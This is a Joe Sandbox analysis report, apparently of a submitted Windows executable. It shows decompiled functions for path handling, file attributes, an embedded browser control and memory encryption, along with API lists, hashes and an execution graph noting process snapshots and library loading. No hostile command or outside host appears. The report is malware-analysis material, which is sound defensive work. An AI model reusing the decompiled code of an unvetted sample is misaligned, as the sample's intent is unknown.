                                                        0x00a07901
                                                        0x00a07904
                                                        0x00a07906
                                                        0x00a0790b
                                                        0x00a0790b
                                                        0x00a07916
                                                        0x00a07923
                                                        0x00a07931
                                                        0x00a07936
                                                        0x00a07938
                                                        0x00a0793a
                                                        0x00a07943
                                                        0x00a07944
                                                        0x00a07945
                                                        0x00a0794a
                                                        0x00a0794c
                                                        0x00a07954
                                                        0x00a07954
                                                        0x00a0794c
                                                        0x00a0795f
                                                        0x00a07964
                                                        0x00a07968
                                                        0x00a0796c
                                                        0x00a07977
                                                        0x00a0797c
                                                        0x00a0797e
                                                        0x00a0799b
                                                        0x00a0799b
                                                        0x00a0797e
                                                        0x00a079a8
                                                        0x00a079b3
                                                        0x00a079b8
                                                        0x00a0789d
                                                        0x00a078a3
                                                        0x00a078a8
                                                        0x00a078b2
                                                        0x00a078b3
                                                        0x00a078b6
                                                        0x00a078b9
                                                        0x00a078be
                                                        0x00a078be
                                                        0x00a079be
                                                        0x00a0787a
                                                        0x00a07881
                                                        0x00a0788d
                                                        0x00a0788d
                                                        0x00a079c9
                                                        0x00a079d3
                                                        0x00a079d3
                                                        0x00a0781b
                                                        0x00a0781f
                                                        0x00000000
                                                        0x00a07821
                                                        0x00a07821
                                                        0x00a07833
                                                        0x00a07841
                                                        0x00000000
                                                        0x00a07841

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00A077FF
                                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A0799B
                                                          • Part of subcall function 00A0A637: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A0A46D,?,?,?,00A0A2B3,?,00000001,00000000,?,?), ref: 00A0A64B
                                                          • Part of subcall function 00A0A637: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A0A46D,?,?,?,00A0A2B3,?,00000001,00000000,?,?), ref: 00A0A67C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: File$Attributes$H_prologTime
                                                        • String ID: :
                                                        • API String ID: 1861295151-336475711
                                                        • Opcode ID: 99ff3de2a50bce73353c422b365904fb36160e3fed2568c40a2cec3b5ed42533
                                                        • Instruction ID: 71c45dfa58f43bcdc67d304d69fdf2d388aff3868807cf6a50d1a8bdecd0fa41
                                                        • Opcode Fuzzy Hash: 99ff3de2a50bce73353c422b365904fb36160e3fed2568c40a2cec3b5ed42533
                                                        • Instruction Fuzzy Hash: 21415271D0426CAAEB20EB50EE55EEEB37DDF45340F004199B649A21C2DB746F89CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0B85C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 81%
                                                        			E00A0B85C(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				signed short* _t30;
				long _t32;
				short _t33;
				void* _t39;
				signed short* _t52;
				void* _t53;
				signed short* _t62;
				void* _t66;
				intOrPtr _t69;
				signed short* _t71;
				intOrPtr _t73;

				E00A1E630();
				_t71 = _a4;
				if( *_t71 != 0) {
					E00A0B9F6(_t71);
					_t66 = E00A23883(_t71);
					_t30 = E00A0BA22(_t71);
					__eflags = _t30;
					if(_t30 == 0) {
						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t32;
						if(_t32 == 0) {
							L22:
							_t33 = 0;
							__eflags = 0;
							L23:
							goto L24;
						}
						__eflags = _t32 - 0x7ff;
						if(_t32 > 0x7ff) {
							goto L22;
						}
						__eflags = E00A0BAFD( *_t71 & 0x0000ffff);
						if(__eflags == 0) {
							E00A0B3F7(__eflags,  &_v4100, 0x800);
							_t39 = E00A23883( &_v4100);
							_t69 = _a12;
							__eflags = _t69 - _t39 + _t66 + 4;
							if(_t69 <= _t39 + _t66 + 4) {
								goto L22;
							}
							E00A10131(_a8, L"\\\\?\\", _t69);
							E00A10109(__eflags, _a8,  &_v4100, _t69);
							__eflags =  *_t71 - 0x2e;
							if(__eflags == 0) {
								__eflags = E00A0BAFD(_t71[1] & 0x0000ffff);
								if(__eflags != 0) {
									_t71 =  &(_t71[2]);
									__eflags = _t71;
								}
							}
							L19:
							_push(_t69);
							L20:
							_push(_t71);
							L21:
							_push(_a8);
							E00A10109(__eflags);
							_t33 = 1;
							goto L23;
						}
						_t13 = _t66 + 6; // 0x6
						_t69 = _a12;
						__eflags = _t69 - _t13;
						if(_t69 <= _t13) {
							goto L22;
						}
						E00A10131(_a8, L"\\\\?\\", _t69);
						_v4096 = 0;
						E00A10109(__eflags, _a8,  &_v4100, _t69);
						goto L19;
					}
					_t52 = E00A0B9F6(_t71);
					__eflags = _t52;
					if(_t52 == 0) {
						_t53 = 0x5c;
						__eflags =  *_t71 - _t53;
						if( *_t71 != _t53) {
							goto L22;
						}
						_t62 =  &(_t71[1]);
						__eflags =  *_t62 - _t53;
						if( *_t62 != _t53) {
							goto L22;
						}
						_t73 = _a12;
						_t9 = _t66 + 6; // 0x6
						__eflags = _t73 - _t9;
						if(_t73 <= _t9) {
							goto L22;
						}
						E00A10131(_a8, L"\\\\?\\", _t73);
						E00A10109(__eflags, _a8, L"UNC", _t73);
						_push(_t73);
						_push(_t62);
						goto L21;
					}
					_t2 = _t66 + 4; // 0x4
					__eflags = _a12 - _t2;
					if(_a12 <= _t2) {
						goto L22;
					}
					E00A10131(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L20;
				} else {
					_t33 = 0;
					L24:
					return _t33;
				}
			}
















                                                        0x00a0b864
                                                        0x00a0b86a
                                                        0x00a0b871
                                                        0x00a0b87d
                                                        0x00a0b88a
                                                        0x00a0b88c
                                                        0x00a0b891
                                                        0x00a0b893
                                                        0x00a0b919
                                                        0x00a0b91f
                                                        0x00a0b921
                                                        0x00a0b9e0
                                                        0x00a0b9e0
                                                        0x00a0b9e0
                                                        0x00a0b9e2
                                                        0x00000000
                                                        0x00a0b9e3
                                                        0x00a0b927
                                                        0x00a0b929
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0b938
                                                        0x00a0b93a
                                                        0x00a0b97f
                                                        0x00a0b98b
                                                        0x00a0b995
                                                        0x00a0b999
                                                        0x00a0b99b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0b9a6
                                                        0x00a0b9b6
                                                        0x00a0b9bb
                                                        0x00a0b9bf
                                                        0x00a0b9cb
                                                        0x00a0b9cd
                                                        0x00a0b9cf
                                                        0x00a0b9cf
                                                        0x00a0b9cf
                                                        0x00a0b9cd
                                                        0x00a0b9d2
                                                        0x00a0b9d2
                                                        0x00a0b9d3
                                                        0x00a0b9d3
                                                        0x00a0b9d4
                                                        0x00a0b9d4
                                                        0x00a0b9d7
                                                        0x00a0b9dc
                                                        0x00000000
                                                        0x00a0b9dc
                                                        0x00a0b93c
                                                        0x00a0b93f
                                                        0x00a0b942
                                                        0x00a0b944
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0b953
                                                        0x00a0b95a
                                                        0x00a0b96c
                                                        0x00000000
                                                        0x00a0b96c
                                                        0x00a0b896
                                                        0x00a0b89b
                                                        0x00a0b89d
                                                        0x00a0b8c5
                                                        0x00a0b8c6
                                                        0x00a0b8c9
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0b8cf
                                                        0x00a0b8d2
                                                        0x00a0b8d5
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0b8db
                                                        0x00a0b8de
                                                        0x00a0b8e1
                                                        0x00a0b8e3
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0b8f2
                                                        0x00a0b900
                                                        0x00a0b905
                                                        0x00a0b906
                                                        0x00000000
                                                        0x00a0b906
                                                        0x00a0b89f
                                                        0x00a0b8a2
                                                        0x00a0b8a5
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0b8b6
                                                        0x00a0b8bb
                                                        0x00000000
                                                        0x00a0b873
                                                        0x00a0b873
                                                        0x00a0b9e4
                                                        0x00a0b9e8
                                                        0x00a0b9e8

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: UNC$\\?\
                                                        • API String ID: 0-253988292
                                                        • Opcode ID: 056551e8e6cd1cd294c722fe9744b096fff896d82593fee31edd5523ab830fe4
                                                        • Instruction ID: 61b4d553019dce2d870b3bf6b0654999f7e5439a093ccba3aba97b7ceabbe9da
                                                        • Opcode Fuzzy Hash: 056551e8e6cd1cd294c722fe9744b096fff896d82593fee31edd5523ab830fe4
                                                        • Instruction Fuzzy Hash: 43418E3255021DBACF20AF61EE42EEE7BB9AF053D0F104526F96496191E7B4DA90C6B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A191F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 44%
                                                        			E00A191F6(void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v4;
				signed int* _v20;
				void* __ecx;
				void* __esi;
				intOrPtr _t21;
				char _t22;
				signed int* _t26;
				intOrPtr* _t28;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int* _t58;

				_t50 = __edi;
				_t34 = _t35;
				_t53 = _a4;
				 *((intOrPtr*)(_t34 + 4)) = _t53;
				_t21 = E00A1E512(__edx, _t53, __eflags, 0x30);
				_v4 = _t21;
				if(_t21 == 0) {
					_t22 = 0;
					__eflags = 0;
				} else {
					_t22 = E00A18A2E(_t21);
				}
				 *((intOrPtr*)(_t34 + 0xc)) = _t22;
				if(_t22 == 0) {
					return _t22;
				} else {
					 *((intOrPtr*)(_t22 + 0x18)) = _t53;
					E00A19A6F( *((intOrPtr*)(_t34 + 0xc)), L"Shell.Explorer");
					_push(1);
					E00A19CCE();
					E00A19C64( *((intOrPtr*)(_t34 + 0xc)), 1);
					_t26 = E00A19B61( *((intOrPtr*)(_t34 + 0xc)));
					_t58 = _t26;
					if(_t58 == 0) {
						L7:
						__eflags =  *((intOrPtr*)(_t34 + 0x10));
						if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
							E00A18C46(_t34);
							_t28 =  *((intOrPtr*)(_t34 + 0x10));
							__eflags =  *((intOrPtr*)(_t34 + 0x20));
							_push(0);
							 *((char*)(_t34 + 0x25)) = 0;
							_t54 =  *_t28;
							_push(0);
							_push(0);
							_push(0);
							if( *((intOrPtr*)(_t34 + 0x20)) == 0) {
								_push(L"about:blank");
							} else {
								_push( *((intOrPtr*)(_t34 + 0x20)));
							}
							 *0xa33260(_t28);
							_t26 =  *((intOrPtr*)(_t54 + 0x2c))();
						}
						L12:
						return _t26;
					}
					_t10 = _t34 + 0x10; // 0x10
					_t30 = _t10;
					_v4 = _t30;
					 *0xa33260(_t58, 0xa3541c, _t30, _t50);
					_t32 =  *((intOrPtr*)( *( *_t58)))();
					 *0xa33260(_t58);
					_t26 =  *((intOrPtr*)( *((intOrPtr*)( *_t58 + 8))))();
					if(_t32 >= 0) {
						goto L7;
					}
					_t26 = _v20;
					 *_t26 =  *_t26 & 0x00000000;
					goto L12;
				}
			}



















                                                        0x00a191f6
                                                        0x00a191f8
                                                        0x00a191fb
                                                        0x00a19201
                                                        0x00a19204
                                                        0x00a19209
                                                        0x00a19210
                                                        0x00a1921b
                                                        0x00a1921b
                                                        0x00a19212
                                                        0x00a19214
                                                        0x00a19214
                                                        0x00a1921d
                                                        0x00a19222
                                                        0x00a192d5
                                                        0x00a19228
                                                        0x00a19229
                                                        0x00a19234
                                                        0x00a1923c
                                                        0x00a1923e
                                                        0x00a19248
                                                        0x00a19250
                                                        0x00a19255
                                                        0x00a19259
                                                        0x00a1929a
                                                        0x00a1929a
                                                        0x00a1929e
                                                        0x00a192a2
                                                        0x00a192a7
                                                        0x00a192ac
                                                        0x00a192af
                                                        0x00a192b0
                                                        0x00a192b3
                                                        0x00a192b5
                                                        0x00a192b6
                                                        0x00a192b7
                                                        0x00a192bb
                                                        0x00a192c2
                                                        0x00a192bd
                                                        0x00a192bd
                                                        0x00a192bd
                                                        0x00a192c8
                                                        0x00a192ce
                                                        0x00a192ce
                                                        0x00a192d1
                                                        0x00000000
                                                        0x00a192d1
                                                        0x00a1925e
                                                        0x00a1925e
                                                        0x00a1926d
                                                        0x00a19271
                                                        0x00a19277
                                                        0x00a19284
                                                        0x00a1928a
                                                        0x00a1928f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a19291
                                                        0x00a19295
                                                        0x00000000
                                                        0x00a19295

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Shell.Explorer$about:blank
                                                        • API String ID: 0-874089819
                                                        • Opcode ID: 6ee4ebbaafc1b6924094ca80315009f9b43d5d41dc0872a6c77aaa81b76130dc
                                                        • Instruction ID: c168009cf3d8d3d30f9cba34b305fe49ff8da01e71227139bd3ff49b6f8fba7b
                                                        • Opcode Fuzzy Hash: 6ee4ebbaafc1b6924094ca80315009f9b43d5d41dc0872a6c77aaa81b76130dc
                                                        • Instruction Fuzzy Hash: 43215171614304AFDB08DF64C8A5AA777A9FF48720F14846DF8098B286DB70EC41CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0EECD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A0EE4E: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A0EE6D
                                                          • Part of subcall function 00A0EE4E: GetProcAddress.KERNEL32(00A481C0,CryptUnprotectMemory), ref: 00A0EE7D
                                                        • GetCurrentProcessId.KERNEL32(?,?,?,00A0EEC7), ref: 00A0EF5F
                                                        Strings
                                                        • CryptProtectMemory failed, xrefs: 00A0EF16
                                                        • CryptUnprotectMemory failed, xrefs: 00A0EF57
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CurrentProcess
                                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                        • API String ID: 2190909847-396321323
                                                        • Opcode ID: 8b9bb42f37e198d436fcb7c599ba00bda4b3a191d78224ebf185a024ce172f24
                                                        • Instruction ID: 84e850fe0d9f2e8d701e142fe462ea4333d30a4268ed80daf177dc073c9b77ca
                                                        • Opcode Fuzzy Hash: 8b9bb42f37e198d436fcb7c599ba00bda4b3a191d78224ebf185a024ce172f24
                                                        • Instruction Fuzzy Hash: 9D113B36A0922DABDF25DF24FD41A6E3755FF40B20B044519FC055B2D1CB7A5E42A7D0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 75%
                                                        			E00A0130B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E00A0DD4C(0xa40ee8, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E00A0DD73(0xa40ee8, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0xa62158(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0xa335b4);
								}
							}
						}
					}
				}
				return 0;
			}





                                                        0x00a01312
                                                        0x00a01375
                                                        0x00a01314
                                                        0x00a01314
                                                        0x00a0131b
                                                        0x00a01331
                                                        0x00a0133a
                                                        0x00a0133f
                                                        0x00a01347
                                                        0x00a0134f
                                                        0x00a01357
                                                        0x00a01365
                                                        0x00a01365
                                                        0x00a01357
                                                        0x00a01347
                                                        0x00a0133a
                                                        0x00a0131b
                                                        0x00a0137d

                                                        APIs
                                                          • Part of subcall function 00A0DD73: _swprintf.LIBCMT ref: 00A0DD99
                                                          • Part of subcall function 00A0DD73: _strlen.LIBCMT ref: 00A0DDBA
                                                          • Part of subcall function 00A0DD73: SetDlgItemTextW.USER32(?,00A3E154,?), ref: 00A0DE1A
                                                          • Part of subcall function 00A0DD73: GetWindowRect.USER32(?,?), ref: 00A0DE54
                                                          • Part of subcall function 00A0DD73: GetClientRect.USER32(?,?), ref: 00A0DE60
                                                        • GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                                        • SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                        • String ID: 0
                                                        • API String ID: 2622349952-4108050209
                                                        • Opcode ID: 6c05232228097ca12bd028bd25cb36e89cd4cb82c2a41c729cf8341692d56785
                                                        • Instruction ID: 1f7ac525be298b855b9514102e392392f3be2e3aea50f44f933669071090fd4d
                                                        • Opcode Fuzzy Hash: 6c05232228097ca12bd028bd25cb36e89cd4cb82c2a41c729cf8341692d56785
                                                        • Instruction Fuzzy Hash: 90F0AF7110434CABDFB54FA0EC49BED3BA8AB11345F088514FE495A5E1C774C992EB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A10B29 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 79%
                                                        			E00A10B29(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E00A06E63(E00A06E68(_t6, 0xa40f50, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0xa40f50, 0xa40f50, 2);
				}
				return _t2;
			}






                                                        0x00a10b29
                                                        0x00a10b2f
                                                        0x00a10b38
                                                        0x00a10b41
                                                        0x00000000
                                                        0x00a10b60
                                                        0x00a10b61

                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,00A10C48,?,?,00A10CBF,?,?,?,?,?,00A10CA9), ref: 00A10B2F
                                                        • GetLastError.KERNEL32(?,?,00A10CBF,?,?,?,?,?,00A10CA9), ref: 00A10B3B
                                                          • Part of subcall function 00A06E68: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A06E86
                                                        Strings
                                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00A10B44
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                        • API String ID: 1091760877-2248577382
                                                        • Opcode ID: bc5ad136fcc07ab2a1dc6538b84730e6a1a6156e08c2b85bc41af6d9a4e77651
                                                        • Instruction ID: 675a0c54ff0cd384042921e4bf16d95b15374fba5b9c1ee488656bd9b6cb29dd
                                                        • Opcode Fuzzy Hash: bc5ad136fcc07ab2a1dc6538b84730e6a1a6156e08c2b85bc41af6d9a4e77651
                                                        • Instruction Fuzzy Hash: D6D05E7690C52076CE0037A4FD0ADAFB9059F52774F240B54F639A51E5CA600A9282E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0DD29 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A0DD29(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}





                                                        0x00a0dd2c
                                                        0x00a0dd3c
                                                        0x00a0dd44
                                                        0x00a0dd46
                                                        0x00000000
                                                        0x00a0dd46
                                                        0x00a0dd4b

                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,00A0D5EF,?), ref: 00A0DD2E
                                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00A0D5EF,?), ref: 00A0DD3C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: FindHandleModuleResource
                                                        • String ID: RTL
                                                        • API String ID: 3537982541-834975271
                                                        • Opcode ID: 3bc6c7dc366862e6ccaf47155a862c5c5ec914400823c12301446fdc64cffbf0
                                                        • Instruction ID: 687814abafafa4317234755352c11161e210c94a619df9252f403b6a5c536cb3
                                                        • Opcode Fuzzy Hash: 3bc6c7dc366862e6ccaf47155a862c5c5ec914400823c12301446fdc64cffbf0
                                                        • Instruction Fuzzy Hash: ABC0123328935076DF3457A07D1DB432E486B12B12F05048CF141DD5D0D5E9C5428650
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:13.4%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:3.1%
                                                        Total number of Nodes:129
                                                        Total number of Limit Nodes:10
                                                        execution_graph 25074 b860f8 25075 b86122 25074->25075 25076 b861e8 GetCommState 25075->25076 25077 b86207 25075->25077 25076->25077 25078 b81978 25079 b81988 25078->25079 25082 b80a34 25079->25082 25083 b819b0 SendMessageW 25082->25083 25085 b81999 25083->25085 25168 b80618 25169 b805ed 25168->25169 25173 b80626 CreateToolhelp32Snapshot 25168->25173 25177 b807b3 25169->25177 25174 b8077d GetCurrentConsoleFont 25173->25174 25176 b808fc 25174->25176 25176->25176 25179 b807e4 GetCurrentConsoleFont 25177->25179 25180 b808fc 25179->25180 25180->25180 25181 b80d98 25182 b80db1 25181->25182 25183 b80dbb 25181->25183 25182->25183 25186 b82370 25182->25186 25190 b82360 25182->25190 25188 b8238a 25186->25188 25194 b80af0 25188->25194 25189 b823b2 25189->25183 25191 b8231a 25190->25191 25191->25190 25192 b80af0 KiUserCallbackDispatcher 25191->25192 25193 b823b2 25192->25193 25193->25183 25195 b80afb 25194->25195 25196 b8243e 25195->25196 25197 b80b40 KiUserCallbackDispatcher 25195->25197 25196->25189 25197->25196 25198 b8cf52 25199 b85f44 BasepGetComputerNameFromNtPath 25198->25199 25200 b8cf65 25199->25200 25201 bd7710 25202 bd772e 25201->25202 25205 bd6064 25202->25205 25204 bd7765 25207 bd9230 LoadLibraryA 25205->25207 25208 bd9329 25207->25208 25086 b8cae8 25087 b8cb21 25086->25087 25088 b8cbe5 25087->25088 25090 b85f44 25087->25090 25091 b85f4f 25090->25091 25092 b8740f 25091->25092 25097 b8788f 25091->25097 25101 b876a1 25091->25101 25107 b876b0 25091->25107 25113 b878a0 25091->25113 25098 b878d4 25097->25098 25117 b85fb4 25098->25117 25103 b876af 25101->25103 25102 b87886 25102->25092 25104 b87728 25103->25104 25105 b8788f BasepGetComputerNameFromNtPath 25103->25105 25106 b878a0 BasepGetComputerNameFromNtPath 25103->25106 25104->25092 25105->25102 25106->25102 25109 b876b1 25107->25109 25108 b87886 25108->25092 25110 b87728 25109->25110 25111 b8788f BasepGetComputerNameFromNtPath 25109->25111 25112 b878a0 BasepGetComputerNameFromNtPath 25109->25112 25110->25092 25111->25108 25112->25108 25114 b878d4 25113->25114 25115 b85fb4 BasepGetComputerNameFromNtPath 25114->25115 25116 b87902 25115->25116 25116->25092 